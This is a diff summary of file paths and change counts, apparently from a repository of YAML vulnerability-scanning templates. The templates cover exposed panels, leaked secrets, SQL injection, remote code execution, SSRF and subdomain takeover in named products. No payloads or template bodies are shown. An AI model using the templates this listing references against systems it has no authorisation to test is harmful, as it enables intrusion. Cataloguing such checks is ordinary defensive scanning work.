poc/other/wso2-2019-0598-11635.yaml | 36 -
poc/other/wso2-management-console-11644.yaml | 19 -
poc/other/wso2-management-console-11645.yaml | 17 +-
poc/other/wso2-management-console-11647.yaml | 30 +
poc/other/wso2-management-console.yaml | 36 +-
...mtconsole(1).yaml => wso2mgmtconsole.yaml} | 0
poc/other/xds-amr-status-11669.yaml | 5 +
poc/other/xff-403-bypass.yaml | 24 +-
poc/other/xprober-service-11694.yaml | 3 +-
poc/other/xxljob-panel.yaml | 18 +-
poc/other/yarn-lock-11730.yaml | 5 +
poc/other/yarn-lock.yaml | 25 +
poc/other/yongyou-ELTextFile.yaml | 2 -
poc/other/yongyou-eltextfile.yaml | 23 +
poc/other/yopass-panel-11749.yaml | 16 -
poc/other/yopass-panel-11750.yaml | 16 +
poc/other/yopass-panel.yaml | 15 +-
poc/other/zhiyuan-oa-info-leak-11797.yaml | 5 +-
poc/other/zhiyuan-oa-info-leak-11799.yaml | 23 +
poc/other/zhiyuan-oa-info-leak-11800.yaml | 23 -
poc/other/zhongkewangwei-fileread.yaml | 20 +
poc/other/zte-panel-11840.yaml | 19 +-
poc/other/zuul-panel-11843.yaml | 33 +
poc/other/zuul-panel.yaml | 22 +-
poc/perl/perl-status-9486.yaml | 17 +-
poc/perl/perl-status-9487.yaml | 16 +
poc/php/clockwork-php-page-1016.yaml | 31 +
poc/php/clockwork-php-page-1019.yaml | 15 +-
...s-9497.yaml => php-backup-files-9498.yaml} | 0
poc/php/php-backup-files.yaml | 127 +-
poc/php/php-errors-9511.yaml | 40 -
poc/php/php-errors.yaml | 41 -
poc/php/php-proxy-detect-9544.yaml | 8 +-
poc/php/php-proxy-detect.yaml | 26 -
poc/php/php-scanner-9546.yaml | 59 +-
poc/php/php-scanner.yaml | 258 +
poc/php/php-timeclock-xss-9552.yaml | 19 +-
poc/php/php-timeclock-xss-9553.yaml | 45 +-
poc/php/php-user-ini-disclosure-9561.yaml | 7 +-
...ml => php-zerodium-backdoor-rce-9572.yaml} | 0
poc/php/php-zerodium-backdoor-rce.yaml | 29 -
poc/php/phpcollab-detect-9499.yaml | 21 +
poc/php/phpcollab-workflow-9502.yaml | 11 +
poc/php/phpcollab-workflow-9503.yaml | 11 -
poc/php/phpcollab-workflow.yaml | 2 +-
poc/php/phpinfo-9520.yaml | 49 -
poc/php/phpldapadmin-panel.yaml | 41 +
poc/php/phpmyadmin-panel-9526.yaml | 18 +-
poc/php/phpmyadmin-setup-9531.yaml | 36 -
poc/php/phpmyadmin-setup-9532.yaml | 30 +
poc/php/phpmyadmin-setup-9533.yaml | 14 +-
poc/php/phpmyadmin-sql-9534.yaml | 28 -
poc/php/phpmyadmin-sql.php-server.yaml | 5 -
poc/php/phpunit-9556.yaml | 34 +
poc/php/phpunit.yaml | 28 -
poc/php/phpwiki-lfi-9567.yaml | 3 +-
poc/php/ruijie-phpinfo-9952.yaml | 5 +-
poc/php/ruijie-phpinfo-9953.yaml | 3 +-
poc/php/thinkphp-2-rce-10740.yaml | 27 -
poc/php/thinkphp-501-rce-10743.yaml | 39 -
poc/php/thinkphp-501-rce.yaml | 24 +
poc/php/thinkphp-5022-rce-10744.yaml | 27 +
poc/php/thinkphp-5022-rce-10746.yaml | 10 +-
...-rce.yaml => thinkphp-5022-rce-10747.yaml} | 0
poc/php/thinkphp-5023-rce-10748.yaml | 25 -
poc/php/thinkphp-5023-rce-10751.yaml | 12 +-
...kphp-509-information-disclosure-10755.yaml | 29 -
.../thinkphp-509-information-disclosure.yaml | 14 +-
poc/php/twig-php-ssti-10856.yaml | 15 +
poc/php/twig-php-ssti-10859.yaml | 1 -
poc/php/weiphp-sql-injection-11190.yaml | 11 +-
poc/php/wp-phpfreechat-xss-11524.yaml | 24 -
poc/php/wp-phpfreechat-xss-11527.yaml | 8 +-
poc/php/wp-phpfreechat-xss-11528.yaml | 2 +-
poc/python/Django-DebugMode.yaml | 8 +-
poc/python/autobahn-python-detect-594.yaml | 30 +
poc/python/autobahn-python-detect-595.yaml | 29 -
poc/python/default-django-page-6840.yaml | 5 +-
poc/python/default-django-page-6841.yaml | 10 +-
poc/python/django-admin-panel-7023.yaml | 18 +
poc/python/django-admin-panel.yaml | 16 +-
poc/python/django-debug-detect.yaml | 12 +-
poc/python/django-debug-exposed-404.yaml | 24 +
poc/python/django-debug-exposure.yaml | 23 +-
.../django-framework-exceptions-7033.yaml | 7 +-
poc/python/django-framework-exceptions.yaml | 30 -
poc/python/django-secret-key.yaml | 31 -
poc/python/django-secret.key.yaml | 62 +
poc/python/jupyter-ipython-unauth-8402.yaml | 21 -
poc/python/jupyter-ipython-unauth-8405.yaml | 15 +-
poc/python/python-metrics-9747.yaml | 10 +-
poc/python/python-metrics.yaml | 25 -
poc/python/python-scanner-9748.yaml | 57 +
poc/python/python-scanner.yaml | 39 -
poc/rabbitmq/rabbitmq-dashboard-9776.yaml | 14 -
poc/rabbitmq/rabbitmq-dashboard-9779.yaml | 15 +
poc/rabbitmq/rabbitmq-default-admin-9780.yaml | 25 +
poc/rabbitmq/rabbitmq-default-admin-9782.yaml | 25 -
poc/rabbitmq/rabbitmq-default-admin.yaml | 2 -
poc/rabbitmq/rabbitmq-default-login-9783.yaml | 12 +-
poc/rabbitmq/rabbitmq-default-login-9786.yaml | 12 +-
poc/redis/exposed-redis-7339.yaml | 27 +
poc/redis/exposed-redis.yaml | 24 +-
.../Panabit-sy_addmount-rce.yaml | 2 +
.../apache-flink-unauth-rce-355.yaml | 50 -
.../apache-httpd-rce-362.yaml | 41 -
.../apache-httpd-rce.yaml | 13 +-
.../apache-solr-log4j-rce-372.yaml | 36 +
.../apache-solr-log4j-rce.yaml | 63 +-
.../cisco-cloudcenter-suite-log4j-rce.yaml | 63 -
.../cisco-cloudcenter-suite-rce.yaml | 73 +
.../code42-log4j-rce-1132.yaml | 36 +-
...4j-rce-1131.yaml => code42-log4j-rce.yaml} | 0
...ml => core-chuangtian-cloud-rce-1211.yaml} | 0
.../custom-datadump-source-code-detect.yaml | 3 +-
.../elex-woocommerce-xss-7199.yaml | 47 -
.../elex-woocommerce-xss.yaml | 35 +
.../eyou-email-rce-7380.yaml | 29 +
.../eyou-email-rce-7382.yaml | 28 +
poc/remote_code_execution/eyou-email-rce.yaml | 4 -
.../fastjson-1-2-24-rce-7400.yaml | 21 +-
.../fastjson-1-2-24-rce.yaml | 46 -
.../fastjson-1-2-41-rce-7403.yaml | 17 +-
.../fastjson-1-2-41-rce.yaml | 31 +
.../fastjson-1-2-42-rce-7407.yaml | 17 +-
...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0
.../fastjson-1-2-43-rce-7411.yaml | 17 +-
.../fastjson-1-2-43-rce-7412.yaml | 44 +
.../fastjson-1-2-47-rce-7415.yaml | 19 +-
.../fastjson-1-2-47-rce-7416.yaml | 9 +-
.../fastjson-1-2-62-rce-7419.yaml | 43 +
.../fastjson-1-2-67-rce-7424.yaml | 17 +-
poc/remote_code_execution/forcepoint.yaml | 14 +-
.../gitlab-rce-7692.yaml | 21 +-
.../gitlab-rce-7693.yaml | 17 +-
.../h3c-imc-rce-7868.yaml | 18 +-
.../hashicorp-consul-rce-7890.yaml | 25 +-
.../hashicorp-consul-rce-7891.yaml | 12 +-
.../hiboss-rce-7945.yaml | 8 +-
.../hiboss-rce-7947.yaml | 14 +-
.../icewarp-webclient-rce-8133.yaml | 25 -
.../jamf-log4j-jndi-rce-8214.yaml | 34 +
.../jamf-log4j-jndi-rce.yaml | 38 -
.../kubernetes-resource-report-8547.yaml | 4 -
.../lotuscms-rce-8650.yaml | 25 -
.../lotuscms-rce-8651.yaml | 10 +-
.../lotuscms-rce-8652.yaml | 34 +
.../lotuscms-rce-8653.yaml | 22 +-
.../metersphere-plugin-rce-8836.yaml | 27 +-
.../metersphere-plugin-rce.yaml | 52 +
.../mirai-unknown-rce-8899.yaml | 34 -
.../mobileiron-log4j-jndi-rce-8905.yaml | 35 +-
.../mobileiron-log4j-jndi-rce-8906.yaml | 29 +-
.../natshell-rce-9009.yaml | 3 +-
.../natshell-rce-9012.yaml | 16 +-
poc/remote_code_execution/netterce.yaml | 46 +-
.../nuuo-nvrmini2-rce-9170.yaml | 23 -
.../nuuo-nvrmini2-rce-9171.yaml | 12 +-
poc/remote_code_execution/opensns-rce.yaml | 25 +-
.../optilink-ont1gew-gpon-rce-9342.yaml | 13 +-
.../optilink-ont1gew-gpon-rce-9343.yaml | 31 +
.../oscommerce-rce-9408.yaml | 7 +-
.../panabit-sy_addmount-rce.yaml | 22 +
.../pdf-signer-ssti-to-rce-9470.yaml | 20 +
.../pdf-signer-ssti-to-rce-9471.yaml | 3 +-
.../pdf-signer-ssti-to-rce-9472.yaml | 22 -
...aml => phalcon-framework-source-9494.yaml} | 0
.../phalcon-framework-source-9496.yaml | 25 -
...ml => php-zerodium-backdoor-rce-9572.yaml} | 0
.../php-zerodium-backdoor-rce.yaml | 29 -
.../powercreator-cms-rce-9645.yaml | 42 +
.../powercreator-cms-rce.yaml | 37 +
...ang-next-generation-firewall-rce-9758.yaml | 32 +
...ang-next-generation-firewall-rce-9761.yaml | 41 +
.../qvisdvr-deserialization-rce-9774.yaml | 1 -
.../qvisdvr-deserialization-rce-9775.yaml | 26 +-
.../rconfig-rce-9834.yaml | 20 +-
.../ruijie-eg-rce-9926.yaml | 10 +-
.../ruijie-eg-rce-9929.yaml | 11 +-
.../salesforce-aura-9984.yaml | 16 +-
.../salesforce-aura.yaml | 27 -
.../samsung-wlan-ap-rce-10009.yaml | 23 +-
.../samsung-wlan-ap-rce-10010.yaml | 9 +-
poc/remote_code_execution/sangfor-BA-rce.yaml | 41 +-
.../sangfor-ba-rce(1).yaml | 8 +-
.../sangfor-ba-rce-10020.yaml | 22 +
.../sangfor-ba-rce-10021.yaml | 13 +-
.../seacms-rce-10101.yaml | 24 +
.../showdoc-file-upload-rce-10227.yaml | 40 +
.../simple-employee-rce-10279.yaml | 49 +
.../simple-employee-rce-10280.yaml | 49 -
.../{spon-ip-rce.yaml => spon-ip-rce(1).yaml} | 0
.../sponip-network-system-ping-rce-10421.yaml | 41 +
.../springboot-h2-db-rce-10455.yaml | 2 +-
...e-10457.yaml => springboot-h2-db-rce.yaml} | 0
.../tamronos-rce-10649.yaml | 32 -
.../tamronos-rce-10651.yaml | 7 +-
.../thinkcmf-rce-10728.yaml | 9 +-
.../thinkcmf-rce-10729.yaml | 27 +-
.../thinkphp-2-rce-10740.yaml | 27 -
.../thinkphp-501-rce-10743.yaml | 39 -
.../thinkphp-501-rce.yaml | 24 +
.../thinkphp-5022-rce-10744.yaml | 27 +
.../thinkphp-5022-rce-10746.yaml | 10 +-
...-rce.yaml => thinkphp-5022-rce-10747.yaml} | 0
.../thinkphp-5023-rce-10748.yaml | 25 -
.../thinkphp-5023-rce-10751.yaml | 12 +-
.../unifi-network-log4j-rce-10974.yaml | 16 +-
.../unifi-network-log4j-rce-10976.yaml | 37 +-
.../vercel-takeover-11000.yaml | 17 +
.../vercel-takeover-11001.yaml | 17 -
.../vercel-takeover.yaml | 31 +-
.../vmware-horizon-log4j-jndi-rce-11034.yaml | 21 +-
.../vmware-horizon-log4j-jndi-rce.yaml | 32 +
.../vrealize-operations-log4j-rce-11070.yaml | 44 +-
.../vrealize-operations-log4j-rce-11071.yaml | 17 +-
.../webui-rce-11170.yaml | 21 -
.../webui-rce-11174.yaml | 20 +
poc/remote_code_execution/webui-rce.yaml | 1 +
...ls-verification-for-woocommerce-11271.yaml | 25 +-
.../wordpress-rce-simplefilelist-11299.yaml | 35 +-
.../wordpress-rce-simplefilelist-11304.yaml | 18 +-
.../wordpress-woocommerce-listing-11338.yaml | 7 +-
.../wordpress-woocommerce-listing-11339.yaml | 22 -
.../wordpress-woocommerce-listing-11341.yaml | 23 +
.../wordpress-woocommerce-sqli-11342.yaml | 6 +-
.../wordpress-woocommerce-sqli-11345.yaml | 44 -
.../workresources-rdp-11380.yaml | 2 +-
poc/remote_code_execution/wp-force-ssl.yaml | 59 +
...-woocommerce-email-verification-11619.yaml | 47 +-
.../wp-woocommerce-file-download-11620.yaml | 38 +
.../wp-woocommerce-file-download.yaml | 25 -
.../wp-xmlrpc-brute-force-11623.yaml | 2 +-
poc/remote_code_execution/yapi-rce-11724.yaml | 27 +-
poc/remote_code_execution/yapi-rce-11725.yaml | 86 +
.../yarn-resourcemanager-rce-11734.yaml | 17 +-
.../yarn-resourcemanager-rce-11737.yaml | 15 +-
poc/ruby/grails-database-admin-console.yaml | 21 +-
poc/ruby/rails-debug-mode-9806.yaml | 17 +
poc/ruby/rails-debug-mode-9807.yaml | 17 -
poc/ruby/rails-debug-mode.yaml | 17 +-
.../rails-secret-token-disclosure-9809.yaml | 22 -
.../rails-secret-token-disclosure-9810.yaml | 23 +
poc/ruby/rails-secret-token-disclosure.yaml | 3 +-
poc/ruby/rails6-xss-9797.yaml | 17 +-
poc/ruby/rails6-xss-9798.yaml | 29 +-
poc/samba/samba-config-9987.yaml | 34 -
poc/samba/samba-config.yaml | 20 +
poc/samba/samba-detect-9988.yaml | 8 +-
poc/samba/samba-swat-panel.yaml | 16 +-
poc/sap/Sap-redirect.yaml | 8 +-
poc/sap/sap-hana-xsengine-panel.yaml | 18 +-
poc/sap/sap-netweaver-detect-10042.yaml | 25 +-
poc/sap/sap-netweaver-detect-10047.yaml | 30 -
poc/sap/sap-netweaver-info-leak-10051.yaml | 24 +
poc/sap/sap-netweaver-info-leak-10052.yaml | 28 -
poc/sap/sap-netweaver-info-leak.yaml | 13 +-
poc/sap/sap-netweaver-webgui.yaml | 20 -
poc/sap/sap-recon-detect-10063.yaml | 30 -
poc/sap/sap-redirect.yaml | 22 -
poc/sap/sap-web-dispatcher-10078.yaml | 9 +-
...sap-web-dispatcher-admin-portal-10071.yaml | 32 +
poc/sap/sapfiori-panel-10033.yaml | 26 +
poc/sap/sapfiori-panel-10034.yaml | 30 -
poc/search/aws-opensearch-login-649.yaml | 24 +
poc/search/aws-opensearch-login-650.yaml | 25 -
poc/search/aws-opensearch-login.yaml | 3 +-
poc/search/elasticsearch-7194.yaml | 20 +-
.../elasticsearch-sql-client-detect-7190.yaml | 21 +
.../elasticsearch-sql-client-detect-7192.yaml | 4 +-
poc/search/jolokia-mbean-search-8363.yaml | 5 +-
poc/search/jolokia-mbean-search.yaml | 13 +-
poc/search/searchbar.yaml | 4 +-
poc/search/searches.yaml | 42 -
.../sensitive-storage-exposure-10143.yaml | 3 +-
poc/sensitive/sensitive-storage-exposure.yaml | 30 -
.../zenphoto-installation-sensitive-info.yaml | 33 -
.../zenphoto-sensitive-info-11784.yaml | 28 +
poc/sensitive/zenphoto-sensitive-info.yaml | 12 +-
.../exposed-sharepoint-list-7345.yaml | 28 -
.../exposed-sharepoint-list-7347.yaml | 8 +-
poc/shopify/shopify-custom-token(1).yaml | 16 +
poc/shopify/shopify-custom-token-10198.yaml | 13 -
poc/shopify/shopify-custom-token-11860.yaml | 5 +-
poc/shopify/shopify-private-token-11861.yaml | 16 -
poc/shopify/shopify-private-token.yaml | 5 +-
poc/shopify/shopify-takeover-10201.yaml | 26 -
poc/shopify/shopify-takeover-10202.yaml | 12 +-
poc/shopify/shopify-takeover-10204.yaml | 11 +-
poc/smtp/easy-wp-smtp-listing-7156.yaml | 19 +
poc/smtp/easy-wp-smtp-listing-7157.yaml | 21 -
poc/smtp/easy-wp-smtp-listing.yaml | 5 +-
poc/smtp/esmtprc-config-7258.yaml | 10 +-
poc/smtp/esmtprc-config-7259.yaml | 11 +-
poc/smtp/msmtp-config-8967.yaml | 42 +
poc/social/api-instagram.yaml | 10 +-
.../flow-flow-social-stream-xss-7524.yaml | 41 +
poc/social/flow-flow-social-stream-xss.yaml | 27 -
poc/social/linkedin-id-11853.yaml | 16 -
poc/social/linkedin-id.yaml | 3 +-
poc/social/sassy-social-share-10083.yaml | 23 +
...are-10087.yaml => sassy-social-share.yaml} | 0
poc/social/twitter-secret-10862.yaml | 3 +-
poc/social/twitter-secret.yaml | 4 +
poc/social/wp-socialfit-xss-11577.yaml | 4 +-
poc/sql/74cms-sqli-9.yaml | 7 +-
.../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0
poc/sql/CRMEB-sqli.yaml | 2 -
poc/sql/GLPI-9.3.3-SQL-Injection.yaml | 19 +-
poc/sql/adb-backup-enabled-60.yaml | 15 +-
...> android-debug-database-exposed-314.yaml} | 0
.../android-debug-database-exposed-315.yaml | 47 +-
...seipdb-384.yaml => api-abuseipdb-385.yaml} | 0
poc/sql/api-abuseipdb.yaml | 31 +
poc/sql/buildbot-panel-803.yaml | 28 +
poc/sql/buildbot-panel.yaml | 29 +-
poc/sql/chamilo-lms-sqli-892.yaml | 37 -
poc/sql/chamilo-lms-sqli.yaml | 26 +
poc/sql/chanjet-crm-sqli.yaml | 21 +
poc/sql/couchdb-adminparty-1235.yaml | 55 +-
poc/sql/couchdb-adminparty-1237.yaml | 39 +
poc/sql/couchdb-exposure-1238.yaml | 25 -
poc/sql/couchdb-exposure-1239.yaml | 24 +
poc/sql/couchdb-exposure-1241.yaml | 6 +-
poc/sql/database-error-6771.yaml | 12 +-
poc/sql/db-backup-lfi-6774.yaml | 25 -
poc/sql/db-backup-lfi-6775.yaml | 30 +
poc/sql/db-backup-lfi-6776.yaml | 11 +-
poc/sql/db-backup-lfi.yaml | 4 -
poc/sql/db-schema-6783.yaml | 38 +
poc/sql/dbeaver-credentials-6780.yaml | 42 -
poc/sql/dbeaver-credentials-6782.yaml | 11 +-
...aml => dedecms-membergroup-sqli-6796.yaml} | 0
poc/sql/dedecms-membergroup-sqli-6798.yaml | 15 +-
poc/sql/dotnetcms-sqli-7089.yaml | 22 +-
poc/sql/dotnetcms-sqli.yaml | 25 -
poc/sql/duomicms-sql-injection-7124.yaml | 27 +
poc/sql/duomicms-sql-injection.yaml | 22 +
poc/sql/ecology-syncuserinfo-sqli-7177.yaml | 19 +-
poc/sql/ecology-syncuserinfo-sqli.yaml | 25 +
.../elasticsearch-sql-client-detect-7190.yaml | 21 +
.../elasticsearch-sql-client-detect-7192.yaml | 4 +-
poc/sql/etouch-v2-sqli-7266.yaml | 26 +
poc/sql/etouch-v2-sqli-7267.yaml | 16 +-
poc/sql/exposed-adb-7280.yaml | 7 +-
poc/sql/exposed-adb-7281.yaml | 15 +-
poc/sql/exposed-adb-7282.yaml | 22 +
poc/sql/exposed-mysql-initial-7323.yaml | 17 +-
poc/sql/exposed-mysql-initial-7324.yaml | 9 +-
poc/sql/exposed-sqlite-manager-7349.yaml | 3 +-
poc/sql/exposed-sqlite-manager.yaml | 18 +-
poc/sql/firebase-database-7490.yaml | 4 +-
poc/sql/glpi-9.3.3-sql-injection.yaml | 25 +
poc/sql/grails-database-admin-console.yaml | 21 +-
poc/sql/hasura-graphql-psql-exec-7899.yaml | 19 +-
poc/sql/influxdb-detect-8160.yaml | 11 +-
poc/sql/influxdb-detect.yaml | 11 +-
poc/sql/jdbc-connection-string-8246.yaml | 7 +-
poc/sql/kevinlab-bems-sqli-8457.yaml | 30 -
poc/sql/kevinlab-bems-sqli-8459.yaml | 20 +-
poc/sql/mdb-database-file-8795.yaml | 32 +
poc/sql/mdb-database-file-8796.yaml | 33 -
poc/sql/mdb-database-file.yaml | 19 +-
poc/sql/mongodb-detect-8920.yaml | 20 +
poc/sql/mongodb-detect.yaml | 20 +-
poc/sql/mongodb-ops-manager.yaml | 19 +-
poc/sql/mongodb-unauth-8925.yaml | 22 -
poc/sql/mongodb-unauth-8928.yaml | 15 +-
poc/sql/mysql-native-password-8981.yaml | 5 +-
poc/sql/mysql-native-password.yaml | 21 +-
poc/sql/odoo-database-manager-9202.yaml | 3 -
poc/sql/odoo-database-manager-9204.yaml | 23 +
poc/sql/odoo-database-manager-9205.yaml | 23 -
poc/sql/openerp-database-9275.yaml | 18 -
poc/sql/openerp-database-9277.yaml | 22 +
poc/sql/openerp-database.yaml | 6 +-
poc/sql/oracle-dbass-detect-9350.yaml | 1 -
poc/sql/oracle-dbass-detect-9351.yaml | 21 -
poc/sql/oracle-dbass-detect.yaml | 18 -
poc/sql/oracle-dbcs-9353.yaml | 9 +-
.../oracle-ebs-sqllog-disclosure-9369.yaml | 26 -
.../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +-
.../pbootcms-database-file-download-9469.yaml | 29 +
poc/sql/pbootcms-database-file-download.yaml | 20 +-
poc/sql/phpmyadmin-sql-9534.yaml | 28 -
poc/sql/phpmyadmin-sql.php-server.yaml | 5 -
poc/sql/pikpikcusqli.yaml | 47 +
poc/sql/puppetdb-detect-9717.yaml | 15 +-
poc/sql/puppetdb-detect-9718.yaml | 11 +-
poc/sql/quick-cms-sqli.yaml | 42 +
poc/sql/seaCMS-sqli.yaml | 28 +-
poc/sql/seacms-sqli-10103.yaml | 39 +
poc/sql/sequoiadb-default-login-10150.yaml | 17 +-
poc/sql/simple-crm-sql-injection-10275.yaml | 18 +-
poc/sql/simple-crm-sql-injection-10277.yaml | 12 +-
poc/sql/springboot-h2-db-rce-10455.yaml | 2 +-
...e-10457.yaml => springboot-h2-db-rce.yaml} | 0
poc/sql/sql-dump.yaml | 19 +-
poc/sql/sql-injection.yaml | 94 +-
poc/sql/sql-monitor.yaml | 20 +-
poc/sql/sql-server-reporting-10509.yaml | 13 -
poc/sql/sqli_header-10504.yaml | 23 -
poc/sql/suspicious-sql-error-messages.yaml | 32 +
poc/sql/symfony-database-config-10615.yaml | 13 +-
poc/sql/symfony-database-config-10616.yaml | 17 -
...aml => symfony-database-config-10617.yaml} | 0
poc/sql/thumbs-db-disclosure-10761.yaml | 10 +-
...e.yaml => thumbs-db-disclosure-10763.yaml} | 0
poc/sql/tidb-unauth-10770.yaml | 23 +
poc/sql/tidb-unauth-10772.yaml | 26 -
poc/sql/time_sql_peremeter.yaml | 469 +-
poc/sql/ucmdb-default-login-10868.yaml | 3 +-
poc/sql/ucmdb-default-login-10871.yaml | 41 +
...in-10869.yaml => ucmdb-default-login.yaml} | 0
poc/sql/unauthenticated-influxdb-10903.yaml | 27 +
poc/sql/unauthenticated-influxdb.yaml | 6 +-
poc/sql/weiphp-sql-injection-11190.yaml | 11 +-
poc/sql/wordpress-db-repair-11252.yaml | 35 +
poc/sql/wordpress-woocommerce-sqli-11342.yaml | 6 +-
poc/sql/wordpress-woocommerce-sqli-11345.yaml | 44 -
poc/sql/wuzhicms-sqli-11659.yaml | 38 +-
poc/sql/xdcms-sqli-11664.yaml | 30 -
poc/sql/xdcms-sqli-11666.yaml | 18 +-
poc/sql/yongyou-jdbcRead.yaml | 35 +-
poc/sql/yongyou-jdbcread.yaml | 42 +
poc/sql/zcms-v3-sqli-11773.yaml | 23 -
poc/sql/zcms-v3-sqli.yaml | 12 +-
poc/sql/zhixiangOA-msglog.aspx-sql.yaml | 4 +-
poc/sql_injection/74cms-sqli-9.yaml | 7 +-
.../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0
poc/sql_injection/CRMEB-sqli.yaml | 2 -
poc/sql_injection/chamilo-lms-sqli-892.yaml | 37 -
poc/sql_injection/chamilo-lms-sqli.yaml | 26 +
poc/sql_injection/chanjet-crm-sqli.yaml | 21 +
...aml => dedecms-membergroup-sqli-6796.yaml} | 0
.../dedecms-membergroup-sqli-6798.yaml | 15 +-
poc/sql_injection/dotnetcms-sqli-7089.yaml | 22 +-
poc/sql_injection/dotnetcms-sqli.yaml | 25 -
.../ecology-syncuserinfo-sqli-7177.yaml | 19 +-
.../ecology-syncuserinfo-sqli.yaml | 25 +
poc/sql_injection/etouch-v2-sqli-7266.yaml | 26 +
poc/sql_injection/etouch-v2-sqli-7267.yaml | 16 +-
.../exposed-sqlite-manager-7349.yaml | 3 +-
poc/sql_injection/exposed-sqlite-manager.yaml | 18 +-
.../kevinlab-bems-sqli-8457.yaml | 30 -
.../kevinlab-bems-sqli-8459.yaml | 20 +-
poc/sql_injection/quick-cms-sqli.yaml | 42 +
poc/sql_injection/seaCMS-sqli.yaml | 28 +-
poc/sql_injection/seacms-sqli-10103.yaml | 39 +
poc/sql_injection/sqli.yaml | 47 +
poc/sql_injection/sqli_header-10504.yaml | 23 -
.../wordpress-woocommerce-sqli-11342.yaml | 6 +-
.../wordpress-woocommerce-sqli-11345.yaml | 44 -
poc/sql_injection/wuzhicms-sqli-11659.yaml | 38 +-
poc/sql_injection/xdcms-sqli-11664.yaml | 30 -
poc/sql_injection/xdcms-sqli-11666.yaml | 18 +-
poc/sql_injection/zcms-v3-sqli-11773.yaml | 23 -
poc/sql_injection/zcms-v3-sqli.yaml | 12 +-
poc/ssh/ssh-authorized-keys-10523.yaml | 22 +-
poc/ssrf/cloudflare-image-ssrf-1021.yaml | 22 +
poc/ssrf/cloudflare-image-ssrf-1023.yaml | 14 +-
poc/ssrf/confluence-ssrf-sharelinks-1191.yaml | 31 +-
poc/ssrf/confluence-ssrf-sharelinks-1192.yaml | 44 +
poc/ssrf/confluence-ssrf-sharelinks-1193.yaml | 36 -
poc/ssrf/hasura-graphql-ssrf-7905.yaml | 47 +
poc/ssrf/hasura-graphql-ssrf.yaml | 10 +-
poc/ssrf/openbmcs-ssrf-9261.yaml | 40 -
poc/ssrf/openbmcs-ssrf.yaml | 27 +
poc/ssrf/targa-camera-ssrf-10657.yaml | 3 +-
poc/ssrf/umbraco-base-ssrf-10881.yaml | 28 +-
poc/ssrf/umbraco-base-ssrf.yaml | 41 -
poc/ssrf/vmware-vcenter-ssrf-11051.yaml | 19 +-
poc/ssrf/vmware-vcenter-ssrf-11052.yaml | 16 +-
...0.yaml => w3c-total-cache-ssrf-11077.yaml} | 0
poc/ssrf/wp-multiple-theme-ssrf-11512.yaml | 4 -
poc/ssrf/wp-multiple-theme-ssrf-11513.yaml | 27 +
poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml | 15 +-
poc/ssrf/yongyou-ssrf-11745.yaml | 18 -
poc/ssrf/yongyou-ssrf.yaml | 7 +-
poc/ssrf/zimbra-preauth-ssrf-11810.yaml | 14 +-
poc/ssrf/zimbra-preauth-ssrf.yaml | 20 +
.../aftership-takeover-205.yaml | 29 +
.../agilecrm-takeover-208.yaml | 18 +
.../agilecrm-takeover-209.yaml | 34 +-
poc/subdomain_takeover/aha-takeover-214.yaml | 11 +-
poc/subdomain_takeover/aha-takeover-215.yaml | 10 +-
poc/subdomain_takeover/aha-takeover-216.yaml | 15 +
...eover-228.yaml => airee-takeover-226.yaml} | 0
.../anima-takeover-318.yaml | 19 -
.../anima-takeover-319.yaml | 15 +
.../announcekit-takeover-324.yaml | 49 +-
.../announcekit-takeover.yaml | 58 +-
.../azure-takeover-detection-683.yaml | 29 +-
.../bigcartel-takeover-727.yaml | 23 -
.../bigcartel-takeover-728.yaml | 24 +
.../bigcartel-takeover.yaml | 12 +-
.../bitbucket-takeover-738.yaml | 21 +
.../bitbucket-takeover-739.yaml | 9 +-
.../bitbucket-takeover-740.yaml | 21 -
.../bitbucket-takeover.yaml | 19 +-
.../brightcove-takeover-783.yaml | 19 +
.../brightcove-takeover-784.yaml | 20 +
.../brightcove-takeover-785.yaml | 15 -
.../brightcove-takeover.yaml | 8 +-
...eover-857.yaml => canny-takeover-854.yaml} | 0
.../canny-takeover-856.yaml | 2 +-
.../cargo-takeover-867.yaml | 19 +
.../cargo-takeover-868.yaml | 15 -
.../cargocollective-takeover-862.yaml | 17 -
.../cargocollective-takeover-863.yaml | 21 +
.../cargocollective-takeover-865.yaml | 3 +-
.../elasticbeantalk-takeover-7188.yaml | 50 +
.../elasticbeantalk-takeover.yaml | 6 +
.../feedpress-takeover-7455.yaml | 2 +-
.../flexbe-takeover-7505.yaml | 23 +
poc/subdomain_takeover/flexbe-takeover.yaml | 14 +-
.../flywheel-takeover-7525.yaml | 17 +
poc/subdomain_takeover/flywheel-takeover.yaml | 20 +-
.../freshdesk-takeover-7540.yaml | 22 -
.../freshdesk-takeover-7541.yaml | 22 +
.../freshdesk-takeover.yaml | 14 +-
.../frontify-takeover-7542.yaml | 18 +
poc/subdomain_takeover/frontify-takeover.yaml | 17 +-
.../gemfury-takeover-7578.yaml | 16 +
poc/subdomain_takeover/gemfury-takeover.yaml | 29 +-
.../getresponse-takeover-7607.yaml | 15 -
.../getresponse-takeover-7609.yaml | 15 +
.../getresponse-takeover-7610.yaml | 5 +-
.../ghost-takeover-7619.yaml | 16 +
.../ghost-takeover-7620.yaml | 17 +-
.../ghost-takeover-7621.yaml | 16 -
.../gitbook-takeover-7627.yaml | 22 +
poc/subdomain_takeover/gitbook-takeover.yaml | 16 +-
.../hatenablog-takeover-7907.yaml | 15 +
.../hatenablog-takeover-7909.yaml | 5 +-
.../helpjuice-takeover-7925.yaml | 15 -
.../helpjuice-takeover-7926.yaml | 19 +
.../helprace-takeover-7930.yaml | 21 +
.../helprace-takeover-7932.yaml | 20 -
poc/subdomain_takeover/helprace-takeover.yaml | 17 +-
.../helpscout-takeover-7933.yaml | 6 +-
.../helpscout-takeover-7936.yaml | 16 +
.../heroku-takeover-7943.yaml | 18 +-
.../heroku-takeover-7944.yaml | 20 -
poc/subdomain_takeover/heroku-takeover.yaml | 3 +
.../hubspot-takeover-8077.yaml | 7 +-
.../hubspot-takeover-8078.yaml | 3 +-
.../intercom-takeover-8166.yaml | 17 +
.../intercom-takeover-8167.yaml | 21 -
.../intercom-takeover-8169.yaml | 5 +-
.../jazzhr-takeover-8235.yaml | 15 +
.../jetbrains-takeover-8292.yaml | 16 +
.../jetbrains-takeover-8294.yaml | 9 +-
.../kinsta-takeover-8492.yaml | 8 +-
.../kinsta-takeover-8495.yaml | 18 -
.../landingi-takeover-8566.yaml | 17 +
.../landingi-takeover-8567.yaml | 17 -
